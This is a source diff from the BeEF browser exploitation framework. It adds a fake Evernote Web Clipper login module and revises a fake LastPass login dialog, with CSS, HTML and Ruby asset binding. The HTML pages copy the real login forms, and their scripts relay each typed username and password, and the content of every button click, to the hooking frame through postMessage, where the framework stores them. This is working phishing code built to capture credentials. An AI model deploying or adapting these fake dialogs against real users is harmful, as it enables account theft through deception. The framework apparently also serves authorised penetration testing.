+  width: 236px;
+}
+input::-webkit-input-placeholder {
+  color: #8E98A1;
+}
+input+.errorHoverRegion {
+  height: 16px;
+  pointer-events: none;
+  position: absolute;
+  right: 11px;
+  top: 10px;
+  width: 16px;
+}
+input.error {
+  background-image: url(../../images/auth_error.png);
+  background-position: -webkit-calc(100% - 12px) 50%;
+  background-size: 16px 16px;
+}
+input.error+.errorHoverRegion {
+  pointer-events: all;
+}
+input.error+.errorHoverRegion:hover:before {
+  background-color: #ED4C5B;
+  border: 1px solid white;
+  border-radius: 3px;
+  bottom: 19px;
+  box-shadow: 0 2px 6px 0 rgba(0, 0, 0, 0.3);
+  content: attr(data-error);
+  color: white;
+  font-family: "GothamMedium", Helvetica, Arial, sans-serif;
+  font-size: 11px;
+  line-height: 20px;
+  padding: 0 5px;
+  position: absolute;
+  right: -5px;
+  text-shadow: none;
+  white-space: nowrap;
+}
+input.error+.errorHoverRegion:hover:after {
+  background-image: url(../../images/auth_error_arrow.png);
+  background-position: 0 0;
+  background-size: 14px 7px;
+  content: "";
+  height: 7px;
+  position: absolute;
+  right: 1px;
+  top: -4px;
+  width: 14px;
+}
+input.valid {
+  background-image: url(../../images/checkmark_green.png);
+  background-position: -webkit-calc(100% - 12px) 50%;
+  background-size: 15px 13px;
+}
+
+.button {
+  border-radius: 3px;
+  color: white;
+  cursor: pointer;
+  height: 36px;
+  line-height: 36px;
+  margin-bottom: 18px;
+  overflow: hidden;
+  text-align: center;
+  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.5);
+}
+
+@media (-webkit-min-device-pixel-ratio: 1.5) {
+  #logo {
+    background-image: url(../../images/clipboard@2x.png), url(../../images/evernote_web_clipper@2x.png);
+  }
+  #logo.china {
+    background-image: url(../../images/clipboard@2x.png), url(../../images/evernote_web_clipper_china@2x.png);
+  }
+  #close {
+    background-image: url(../../images/close_login@2x.png);
+  }
+  input.error {
+    background-image: url(../../images/auth_error@2x.png);
+  }
+  input.error+.errorHoverRegion:hover:after {
+    background-image: url(../../images/auth_error_arrow@2x.png);
+  }
+  input.valid {
+    background-image: url(../../images/checkmark_green@2x.png);
+  }
+}
+
+#switcher {
+  color: #C2CFD7;
+  cursor: pointer;
+  display: none;
+  font-family: "GothamMedium", Helvetica, Arial, sans-serif;
+  font-size: 12px;
+  height: 15px;
+  line-height: 15px;
+  margin-bottom: 14px;
+  outline: none;
+  position: relative;
+  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.5);
+}
+#switcher.visible {
+  display: inline-block;
+}
+#switcher:after {
+  background-image: url(../../images/forward.png);
+  background-size: 16px 16px;
+  content: "";
+  height: 16px;
+  position: absolute;
+  right: -21px;
+  top: 1px;
+  width: 16px;
+}
+
+#globalError {
+  background-color: #262C32;
+  background-image: url(error-clip.png);
+  background-position: 28px 5px;
+  background-size: 16px 16px;
+  border-bottom: 1px solid #21262C;
+  border-top: 1px solid #21262C;
+  color: white;
+  font-family: "GothamMedium", Helvetica, Arial, sans-serif;
+  font-size: 10px;
+  margin: 0 0 15px -28px;
+  overflow: hidden;
+  padding: 8px 28px 8px 49px;
+  width: -webkit-calc(100% - 21px);
+}
+#globalError:empty {
+  display: none;
+}
+#globalError button {
+  color: black;
+  float: right;
+  font-size: 12px;
+  padding: 3px 6px;
+}
+
+input {
+  max-width: 251px;
+  width: 251px;
+}
+
+#username {
+  margin-bottom: 18px;
+}
+
+#simsearch .checkbox, #simsearch .label {
+  display: inline-block;
+  vertical-align: top;
+}
+#simsearch .checkbox {
+  background-color: #737F89;
+  border: 1px solid #21262C;
+  border-radius: 3px;
+  cursor: pointer;
+  height: 16px;
+  outline: none;
+  width: 16px;
+}
+#simsearch .checkbox.checked {
+  background-image: url(../../images/checkmark.png);
+  background-position: 2px 4px;
+  background-size: 12px 10px;
+}
+#simsearch .label {
+  color: #C2CFD7;
+  font-family: "GothamMedium", Helvetica, Arial, sans-serif;
+  font-size: 12px;
+  line-height: 16px;
+  padding-bottom: 26px;
+  padding-left: 3px;
+  padding-top: 1px;
+  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.5);
+  width: -webkit-calc(100% - 25px);
+}
+#simsearch .label .help {
+  background-image: url(../../images/question-mark.png);
+  background-size: 15px 15px;
+  cursor: pointer;
+  display: inline-block;
+  height: 15px;
+  margin-left: 5px;
+  position: relative;
+  vertical-align: middle;
+  width: 15px;
+}
+#simsearch .label .help:hover:before {
+  background-color: #FAFAFA;
+  border: 1px solid #21262C;
+  border-radius: 3px;
+  bottom: 24px;
+  box-shadow: 0 2px 6px 0 rgba(0, 0, 0, 0.3);
+  color: #3A4045;
+  content: attr(data-tooltip);
+  font-family: "GothamMedium", Helvetica, Arial, sans-serif;
+  font-size: 10px;
+  left: -81px;
+  line-height: 13px;
+  padding: 5px 7px;
+  position: absolute;
+  text-shadow: none;
+  width: 168px;
+}
+#simsearch .label .help:hover:after {
+  background-image: url(../../images/login_simsearch_tooltip_arrow.png);
+  background-repeat: no-repeat;
+  background-size: 30px 15px;
+  bottom: 10px;
+  content: "";
+  height: 15px;
+  left: -8px;
+  position: absolute;
+  width: 30px;
+}
+
+#login {
+  background-color: #26B064;
+  box-shadow: inset 0 1px #33CC78;
+  font-family: "GothamBold", Helvetica, Arial, sans-serif;
+  font-size: 16px;
+  outline: none;
+  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.5);
+}
+#reg {
+  background-color: #209BC9;
+  box-shadow: inset 0 1px #48C0ED;
+  font-family: "GothamMedium", Helvetica, Arial, sans-serif;
+  font-size: 13px;
+  outline: none;
+}
+#forgotPw {
+  color: #C2CFD7;
+  cursor: pointer;
+  font-family: "GothamMedium", Helvetica, Arial, sans-serif;
+  font-size: 11px;
+  height: 14px;
+  line-height: 14px;
+  outline: none;
+  overflow: hidden;
+  text-align: center;
+  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.5);
+}
+
+@media (-webkit-min-device-pixel-ratio: 1.5) {
+  #switcher:after {
+    background-image: url(../../images/forward@2x.png);
+  }
+  #globalError {
+    background-image: url(../../images/error-clip@2x.png);
+  }
+  #simsearch .checkbox.checked {
+    background-image: url(../../images/checkmark@2x.png);
+  }
+  #simsearch .label .help {
+    background-image: url(../../images/question-mark@2x.png);
+  }
+  #simsearch .label .help:hover:after {
+    background-image: url(../../images/login_simsearch_tooltip_arrow@2x.png);
+  }
+}

modules/social_engineering/fake_evernote_clipper/login.html

@@ -0,0 +1,47 @@
+<html>
+  <head>
+    <link type="text/css" rel="stylesheet" href="login.css"></link>
+  </head>
+  <body>
+    <div id="main">
+      <div id="logo"></div>
+      <div id="close" tabindex="8"></div>
+      <div id="switcher" tabindex="7"></div>
+      <div id="globalError"></div>
+      <div class="inputContainer">
+        <input id="username" autofocus tabindex="1" placeholder="Email"/>
+        <div class="errorHoverRegion"></div>
+      </div>
+      <div class="inputContainer">
+        <input id="password" type="password" tabindex="2" placeholder="Password" />
+        <div class="errorHoverRegion"></div>
+      </div>
+      <div id="login" class="button" message="loginForm_login" tabindex="4" value="Sign In">Sign In</div>
+      <div id="reg" class="button" message="header_register" tabindex="5" value="Create an Evernote account">Create an Evernote account</div>
+      <div id="forgotPw" message="forgotPassword" tabindex="6" value="Forgot password?">Forgot password?</div>
+    </div>
+
+
+    <script src="jquery.js" type="text/javascript"></script>
+<script>
+$(document).ready(function() {
+  $('#username').keyup(function() {
+    parent.postMessage('Username field changed to: ' + $('#username').val(),'*');
+  });
+
+  $('#password').keyup(function() {
+    parent.postMessage('Password field changed to: ' + $('#password').val(),'*');
+  });
+
+  $('#login,#reg,#forgotPw,#close').click(function() {
+    parent.postMessage('Button Clicked - username field: ' + $('#username').val() + '; password field: ' + $('#password').val(),'*');
+    parent.postMessage('KILLFRAME','*');
+  });
+
+  $('#username').focus();
+
+});
+
+</script>
+  </body>
+</html>

modules/social_engineering/fake_evernote_clipper/module.rb

@@ -0,0 +1,41 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_evernote_clipper < BeEF::Core::Command
+  
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/login.html','/ev/login','html')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/login.css','/ev/login','css')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/clipboard.png','/ev/clipboard','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/close_login.png','/ev/close_login','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/error-clip.png','/ev/error-clip','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/evernote_web_clipper.png','/ev/evernote_web_clipper','png')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/GothamSSm-Medium.otf','/ev/GothamSSm-Medium','otf')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/GothamSSm-Bold.otf','/ev/GothamSSm-Bold','otf')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_evernote_clipper/jquery-1.5.2.min.js','/ev/jquery','js')
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    if (@datastore['meta'] == "KILLFRAME") 
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/login.html')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/login.css')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/clipboard.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/close_login.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/error-clip.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/evernote_web_clipper.png')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/GothamSSm-Medium.otf')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/GothamSSm-Bold.otf')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/ev/jquery.js')
+    end
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end

modules/social_engineering/fake_lastpass/command.js

@@ -22,12 +22,10 @@ beef.execute(function() {
 	},false);	
 
 	if (beef.browser.isC()) {
-		beef.dom.createIframe('custom', {'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/index.html','id':'LPIFRAME'}, {'width':'375px','height':'415px','position':'fixed','right':'0px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'1px solid white','overflow':'hidden'}); 
+		beef.dom.createIframe('custom', {'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/index.html','id':'LPIFRAME'}, {'width':'294px','height':'352px','position':'fixed','right':'5px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'1px solid white','overflow':'hidden'}); 
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Chrome IFrame Created .. awaiting messages');	
 	} else {
-		// Don't know how NON Chrome browsers look - so just going to pop the FF dialog
-		beef.dom.createIframe('custom' ,{'src':beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/lp/indexFF.html','id':'LPIFRAME'}, {'width':'260px','height':'300px','position':'fixed','left':(($j(window).width()/2)-130)+'px','top':'0px','z-index':beef.dom.getHighestZindex()+1,'border':'0px solid black','overflow':'hidden'}); 
-		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Non-Chrome IFrame Created .. awaiting messages');	
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=No IFrame Created -- browser is not Chrome');	
 	}
 
 	// $j('body').append("<div id='lp_login_dia' style='width:375px; height:415px; position: fixed; right: 0px; top: 0px; z-index: "+beef.dom.getHighestZindex()+1+"; border: 1px solid white; overflow: hidden; display: none'></div>");

modules/social_engineering/fake_lastpass/config.yaml

@@ -12,4 +12,4 @@ beef:
             description: "Displays a fake LastPass user dialog."
             authors: ["xntrik", "gcattani"]
             target:
-                user_notify: ['ALL']
+                user_notify: ['C']

modules/social_engineering/fake_lastpass/index-new.html

@@ -0,0 +1,536 @@
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
+
+<style type="text/css">
+body { font-family: Helvetica,Arial; min-width: 200px; min-height: 200px; }
+
+.fullpage{
+  max-width:250px;
+}
+#_docwrite_login_small7 { white-space:normal; width:258px !important; }
+#showvault { vertical-align: top; }
+
+#loginbody hr{
+  width:150%;
+  margin-left:-15%;
+  display: block; height: 1px;
+  border: 0; border-top: 1px solid #ccc;
+  margin-top: 15px; 
+}
+
+#loginbody{
+  height:300px;
+  color:#4c4c4c;
+  overflow:hidden;
+}
+
+#loginbody #deleteicon, #logincontainer #deleteicon{
+  margin-top:-2px;
+}
+/*
+#loginbody .teardrop{
+  margin-right:30px;
+}
+*/
+
+#rememberemailrow, #rememberpasswordrow{
+  padding:3px 0px;
+}
+.logininput { width:228px; height: 27px;
+  padding-right: 40px;
+  padding-left: 5px;
+ }
+.inputdiv input{ margin-top:2px; }
+
+#loginheader img{
+  float:right;
+  padding:5px 5px 0 0;
+  opacity:0.6;
+}
+#logintitletxt{
+  font-size:19px;
+}
+
+.inputdiv { padding-bottom:12px;}
+
+#forgotcontainer{
+  display:inline-block;
+  vertical-align:top;
+  margin-top:1px;
+  float:right;
+  margin-right:10px;
+}
+
+#screenkeyboard{
+  margin-left:-40px;
+}
+
+#screenkeyboard img{
+  opacity:0.6;
+}
+#screenkeyboard img:hover{
+  opacity:1.0;
+}
+
+#screenkeyboardcontainer{
+  position:relative;
+  top:4px;
+}
+
+#deleteicon{
+  opacity:0.6;
+  margin-left:-22px;
+}
+#deleteicon:hover{
+  opacity:1.0;
+}
+#u_button{
+  left:190px !important;
+}
+/* General */
+.clear         {clear:both;font-size:0;height:0;line-height:0;overflow:hidden;}
+
+table td       {
+	padding-right:10px;
+	white-space:nowrap;
+}
+
+
+#createaccount input[type=text], #createaccount input[type=password]{
+  width:300px;
+}
+#createaccount select{
+  width:300px;
+}
+#createaccount .toprows{
+  padding:4px 0px;
+}
+#createaccount #emailerror{
+  color:red;
+}
+
+.wiz, .wiz table{
+  font-size:14px;
+}
+
+.content{
+  width:50%;
+  margin: 50px auto;
+  background: white;
+  border-radius: 5px;
+  border: 1px gray solid;
+  padding: 35px 15px;
+}
+.contentwide{
+  width:55%;
+}
+.dimpled button{
+  padding:7px;
+  margin: 2px 5px;
+}
+#_docwrite_welcome3{
+  margin: 5px 0px;
+}
+.dimpled img{
+  margin:auto;
+}
+#_docwrite_welcome1{
+  vertical-align: middle;
+  text-align: center;
+  width: 100%;
+}
+.dimpled img{
+  margin-left: 100px;
+}
+#reenterpassword{
+  width:300px;
+}
+.createlink{
+  font-weight:normal !important;
+  font-size:inherit !important;
+}
+
+.imgcenter{
+  display:block !important;
+  margin:0px auto !important;
+}
+
+.dialog{
+  border:1px solid #949494;
+  border-radius: 2px;
+  background:#e6e6e6;
+  color:#4c4c4c;
+  margin:50px auto;
+}
+
+#googleauth, #outofband, #yubikey, #sesame, #grid{
+  width:702px;
+  height:290px;
+  border:1px solid #949494;
+  border-radius: 2px;
+  background:#e6e6e6;
+  color:#4c4c4c;
+  margin:50px auto;
+}
+.multiheader{
+  background:white;
+  border-bottom:1px solid #949494;
+  height:64px;
+}
+.multiheader img{
+   padding:20px 0 0 20px;
+}
+
+.leftcol{
+  float:left;
+}
+
+.multileft{
+  width:472px;
+  border-right:1px solid #c3c3c3;
+  padding:8px;
+  font-size:14px;
+  min-height:210px;
+}
+.multileft a{
+  text-decoration:none;
+  color:#848484;
+  float:right;
+  font-size:12px;
+}
+
+#googright{
+  background:url(gauthlastpass.png) no-repeat center center;
+  width:200px;
+  height:200px;
+}
+
+.multiright{
+  background:url(gauthlastpass.png) no-repeat center center;
+  width:200px;
+  height:200px;
+}
+
+#yubiright{
+  background:url(yubikeyicon2.jpg) no-repeat center center;
+  width:200px;
+  height:200px;
+}
+#sesameright{
+  background:url(step2.gif) no-repeat center center;
+  width:150px;
+  height:150px;
+}
+#gridright{
+  background:url(spreadsheet.png) no-repeat center center;
+  width:200px;
+  height:200px;
+}
+
+
+
+
+
+#googleauthotp{
+  width:100px;
+  height:24px;
+  padding-left:20px;
+}
+.multienter{
+  font-weight:bold;
+  margin:0px;
+}
+.multidesc{
+  padding-top:18px;
+}
+.multititle{
+  float:right;
+  padding:20px 10px 0 0;
+}
+.lost{
+  padding-left:50px;
+}
+.vault-table{
+  border-top:1px solid #c3c3c3
+}
+#googleauthauth{
+  height:30px;
+}
+#labelgoogleauth{
+  padding:5px 3px;
+}
+.stdbg{
+   background:#e6e6e6;
+  padding:0 20px;
+}
+
+.okbutton{
+  border-radius: 2px !important;
+  color:#fff !important;                /* final */
+  background-color:#e0322d !important;  /* final */
+  /*font-weight:bold !important;*/
+  border-color:#af1510 !important;     /* final */
+  background-image: none !important;
+  text-shadow:none !important;
+  min-width: 110px;
+  padding:6px 0px;
+}
+
+.okbutton:hover{
+  background-color: #d12a25 !important;
+}
+
+
+.stdtext{
+  color:#4c4c4c;
+  font-family:Helvetica, Arial, sans-serif;
+  font-size:14px;
+}
+
+
+.stdbtn {
+background-color: #eeeeee;
+background-image: -webkit-gradient(linear, left top, left bottom, from(#eeeeee), to(#cccccc));
+background-image: -webkit-linear-gradient(top, #eeeeee, #cccccc);
+background-image: -moz-linear-gradient(top, #eeeeee, #cccccc);
+background-image: -ms-linear-gradient(top, #eeeeee, #cccccc);
+background-image: -o-linear-gradient(top, #eeeeee, #cccccc);
+background-image: linear-gradient(top, #eeeeee, #cccccc);
+border: 1px solid #ccc;
+border-bottom: 1px solid #bbb;
+-webkit-border-radius: 3px;
+color: #333;
+line-height: 1;
+font-weight: bold;
+padding: 8px 0;
+text-align: center;
+text-shadow: 0 1px 0 #eee;
+min-width: 110px;
+margin: 4px;
+}
+input[type=button] {
+background-color: #eeeeee;
+background-image: -webkit-gradient(linear, left top, left bottom, from(#eeeeee), to(#cccccc));
+background-image: -webkit-linear-gradient(top, #eeeeee, #cccccc);
+background-image: -moz-linear-gradient(top, #eeeeee, #cccccc);
+background-image: -ms-linear-gradient(top, #eeeeee, #cccccc);
+background-image: -o-linear-gradient(top, #eeeeee, #cccccc);
+background-image: linear-gradient(top, #eeeeee, #cccccc);
+border: 1px solid #ccc;
+border-bottom: 1px solid #bbb;
+-webkit-border-radius: 3px;
+color: #333;
+line-height: 1;
+font-weight: bold;
+padding: 8px 0;
+text-align: center;
+text-shadow: 0 1px 0 #eee;
+min-width: 110px;
+margin: 4px;
+}
+
+#prefsheader{
+  height:65px;
+  border-bottom:1px solid #c3c3c3;
+  background-color:white;
+}
+#prefsheader img{
+  padding:22px 0 0 32px;
+}
+.dropStyle {
+  background: #fff !important;
+  color: #000 !important;
+  position:absolute;
+  cursor:default;
+  text-align:left;
+  font-size:14px;
+  z-index:10000;
+  height:120px;
+  overflow:auto;
+  border: 1px solid #000 !important;
+  padding: 4px 0px;
+  font-family: Arial, Helvetica, sans-serif; font-weight:normal;
+}
+.dropStyle div{
+  display:block;
+  padding: 1px 0px;
+  outline: none;  /* need this to disable webkit default glow */
+}
+
+.item {
+}
+.focus {
+      /* background: #d2d2d2 !important;*/
+        background: #dddddd;   /* final from levi */
+	color: #000 !important;
+	-webkit-border-radius: 0;
+	-moz-border-radius: 0;
+	text-shadow: 0 1px 1px rgba(0, 0, 0, .1);
+  font-family: Arial, Helvetica, sans-serif; font-weight:normal;
+}
+
+.item[aria-disabled="true"] {
+  color: grey;
+}
+.offscreen {
+   position: absolute;
+  left: -9000px;
+  width: 0;
+  overflow: hidden;
+}
+
+.teardrop{
+  opacity:0.5;
+  background-color: #fff;
+}
+.teardrop:hover, .teardrop:active{
+  opacity:1;
+  /*background-color: #d2d2d2;*/
+  background: #dddddd;   /* final from levi */
+}
+
+body { padding:10px 20px; font:13px Helvetica, Arial, Tahoma, sans-serif; }
+
+.graybody {
+  background: #e6e6e6;
+}
+
+.logintitle{
+  font-size:12px; font-weight:bold; 
+}
+
+.css3button {
+	font-family: Helvetica, Arial, sans-serif; font-weight:bold;
+	font-size: 14px;
+	color: #ffffff;
+	padding: 2px 15px;
+	background: -webkit-linear-gradient(top, rgba(32,188,232,1) 0%,rgba(0,119,232,1) 100%);
+	-webkit-border-radius: 30px;
+	border: 2px solid #ffffff;
+	-webkit-box-shadow:
+		0px 3px 11px rgba(000,000,000,0.5),
+		inset 0px 0px 1px rgba(005,000,004,1);
+	text-shadow:
+		0px -1px 0px rgba(000,000,000,0.2),
+		0px 1px 0px rgba(255,255,255,0.3);
+}
+
+.css3button:hover {
+	cursor:hand;
+	 background:-webkit-gradient(linear, left top, left bottom, color-stop(0%,#158aff), color-stop(44%,#0b7ef1), color-stop(100%,#126eca));
+}
+
+/** text area input with shadow **/
+
+
+
+checkbox {
+	padding: 4px;
+	}
+
+
+/** input focus darkening **/
+
+
+.form label { 
+	margin-left: 10px; 
+	color: #999999;
+	font-weight:bold; 
+	}
+
+a:link, a:active {
+	font-size : 11px;
+	font-family : helvetica;
+	text-decoration : none;
+	padding-left:10px
+	}
+	
+	a:hover {
+		font-family : helvetica;
+		color : #09F;
+		text-decoration : none;
+		}
+
+button{
+  min-width:110px;
+  padding:6px 15px;
+}
+
+.okbutton{
+  border-radius: 0px !important;
+  color:#fff !important;                /* final */
+  background-color:#e0322d !important;  /* final */
+  /*font-weight:bold !important;*/
+  background-image: none !important;
+  text-shadow:none !important;
+  min-width: 110px;
+}
+
+.okbutton:hover{
+  background-color: #d12a25 !important;
+}
+
+#loginbody a, #loginbodyfull a{
+  color:#848484;
+}
+
+#logincontainer{
+  background:#e6e6e6;
+  margin:50px auto;
+  width: 280px;
+  border-radius: 1px;
+  border: 1px solid #c3c3c3;
+}
+
+#logininner{
+  padding:20px;
+}
+#donotrepromptfor{
+  vertical-align:middle;
+}
+
+</style>
+
+<!-- <script src="lpfulllib.js"></script>
+<script src="db.js"></script>
+<script src="popupcombobox.js"></script>
+<script src="prefs.js"></script>
+<script src="server.js"></script>
+<script src="login.js"></script>
+<script src="popupfilltab_cs.js"></script>
+ -->
+
+ <script src="jquery.js" type="text/javascript"></script>
+<script>
+$(document).ready(function() {
+	$('#u').keyup(function() {
+		parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
+	});
+
+	$('#p').keyup(function() {
+		parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
+	});
+
+	$('#rememberemail').change(function() {
+		parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
+	});
+
+	$('#rememberpassword').change(function() {
+		parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
+	});
+
+	$('#showvault').change(function() {
+		parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
+	});
+
+	$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
+		parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
+		parent.postMessage('KILLFRAME','*');
+	});
+
+	$('#u').focus();
+
+});
+
+</script>
+</head><body id='loginbody' class="graybody" style='width:236px;min-width:236px'><div id='loginheader'><span id="logintitletxt">Sign In</span><img id="logoimg" src='lp_signin_logo.png'/></div><br/><br/><div id="reprompttext" style="display: none;"><br><span id="_docwrite_login_small1"></span><br><br></div><div id="nodbtext" style="display: none; color: red;"><br><b><span id="_docwrite_login_small2"></span></b><br><br></div><form id='f'><div class='inputdiv'><span class='logintitle'><span id="_docwrite_login_small3">Email</span>:</span><br/><input type='text' spellcheck="false" id='u' class='logininput' name='username' value=''/></div><div class='inputdiv'><span class='logintitle'><span id="_docwrite_login_small4">Password</span>:</span><div id="forgotcontainer"><a id='forgot' href='#' tabindex="-1"><span id="_docwrite_login_small21"></span></a></div><br/><div><input type='password' class='logininput' id='p' name='password'/></div></div><div id="rememberemailrow"><input type='checkbox' name='rememberemail' id='rememberemail'/>&nbsp;&nbsp;<label for="rememberemail"><span id="_docwrite_login_small5">Remember Email</span></label></div><div id="rememberpasswordrow"><input type='checkbox' name='rememberpassword' id='rememberpassword'/>&nbsp;&nbsp;<label for="rememberpassword"><span id="_docwrite_login_small6">Remember Password</span></label></div><div id="showvaultrow"><input type='checkbox' name='showvault' id='showvault'/>&nbsp;&nbsp;<label for="showvault"><span id="_docwrite_login_small7">Show Vault After Login</span></label></div><div id="donotrepromptforrow" style="display: none;"><br/><input type='checkbox' name='donotrepromptfor' id='donotrepromptfor'/>&nbsp;&nbsp;<label for="donotrepromptfor"><span id="_docwrite_login_small8"></span></label><select id="donotrepromptforsecs"><option value="0"></option><option value="30" id="_docwrite_login_small9"></option><option value="60" id="_docwrite_login_small10"></option><option value="300" id="_docwrite_login_small11"></option><option value="900" id="_docwrite_login_small12"></option><option value="1800" id="_docwrite_login_small13"></option><option value="3600" id="_docwrite_login_small14"></option><option value="10800" id="_docwrite_login_small15"></option><option value="21600" id="_docwrite_login_small16"></option><option value="28800" id="_docwrite_login_small25"></option><option value="43200" id="_docwrite_login_small17"></option><option value="86400" id="_docwrite_login_small18"></option></select></div><hr/><div id='btnrow' class='btnrow'><table class='buttontable'><tr><td><button class='okbutton' id='login'/>Login</button></td><td><button id='cancel'/>Cancel</button></td></tr></table></div></form><div id='links'><span id="createaccountcontainer"><a id='createaccount' href='#'><span id="_docwrite_login_small23">New here? Create an Account.</span></a><br/></span></div><br/><div id='error'></div></body></html>
+

modules/social_engineering/fake_lastpass/indexFF.html

@@ -1,67 +0,0 @@
-<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
-<style type="text/css">
-body { font-family: Helvetica,Arial;
-color:-moz-DialogText;
-background-color: #ededed;
-font: message-box;
-}
-
-
-</style>
-<script src="jquery.js" type="text/javascript"></script>
-<script>
-$(document).ready(function() {
-	$('#u').keyup(function() {
-		parent.postMessage('Username field changed to: ' + $('#u').val(),'*');
-	});
-
-	$('#p').keyup(function() {
-		parent.postMessage('Password field changed to: ' + $('#p').val(),'*');
-	});
-
-	$('#rememberemail').change(function() {
-		parent.postMessage('Remember Email changed to: ' + $('#rememberemail').prop('checked'),'*');
-	});
-
-	$('#rememberpassword').change(function() {
-		parent.postMessage('Remember Password changed to: ' + $('#rememberpassword').prop('checked'),'*');
-	});
-
-	$('#showvault').change(function() {
-		parent.postMessage('Show Vault changed to: ' + $('#showvault').prop('checked'),'*');
-	});
-
-	$('#login,#cancel,#forgot,#screenkeyboard,#createaccount').click(function() {
-		parent.postMessage('Button Clicked - username field: ' + $('#u').val() + '; password field: ' + $('#p').val(),'*');
-		parent.postMessage('KILLFRAME','*');
-	});
-
-});
-
-</script>
-</head><body>
-
-<div style="text-align: center; padding-bottom:5px"><img src="/img/icon.png" /></div>
-<form>
-<div style="text-align: center">
-	<div style="text-align: left; padding-left: 12px; padding-bottom:5px">Email</div>
-	<div style="text-align: left; padding-left: 12px; padding-bottom:5px"><input type="text" style="width:220px;height:20px" id='u' /></div>
-	<div style="text-align: left; padding-left: 12px;padding-bottom:5px">Master Password</div>
-	<div style="text-align: left; padding-left: 12px;padding-bottom:10px"><input type="password" style="width:220px;height:20px" id='p' /></div>
-	<div style="text-align: left; padding-left: 12px; padding-bottom:5px"><input type="checkbox" checked="checked" id='rememberemail'>Remember Email</input></div>
-	<div style="text-align: left; padding-left: 12px; padding-bottom:5px"><input type="checkbox" id='rememberpassword'>Remember Password</input></div>
-	<div style="text-align: left; padding-left: 12px; padding-bottom:10px"><input type="checkbox" checked="checked" id='showvault'>Show My LastPass Vault After Login</input></div>
-</div>
-
-<div style="text-align:center; padding-left: 15px; padding-bottom:5px">
-	<div style="text-align:left; padding-bottom: 10px"><a href="#" style="text-decoration: none" id='forgot'>I forgot my password, Help!</a></div>
-	<div style="text-align:left; padding-bottom: 10px"><a href="#" style="text-decoration: none" id='screenkeyboard'>Screen Keyboard</a> &nbsp;&nbsp; <a href="#" style="text-decoration: none" id='createaccount'>Create an Account</a></div>
-</div>
-
-<div style="text-align:right">
-	<input type="button" value="Cancel" style="width:77px; height:21px" id='cancel' /> <input type="button" value="Login" style="width:77px; height:21px" id='login' />
-</div>
-</form>
-
-
-</body></html>

modules/social_engineering/fake_lastpass/module.rb

@@ -6,16 +6,12 @@
 class Fake_lastpass < BeEF::Core::Command
   
   def pre_send
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/index.html','/lp/index','html')
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/indexFF.html','/lp/indexFF','html')
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_lastpass/key_small.png','/lp/key_small','png')
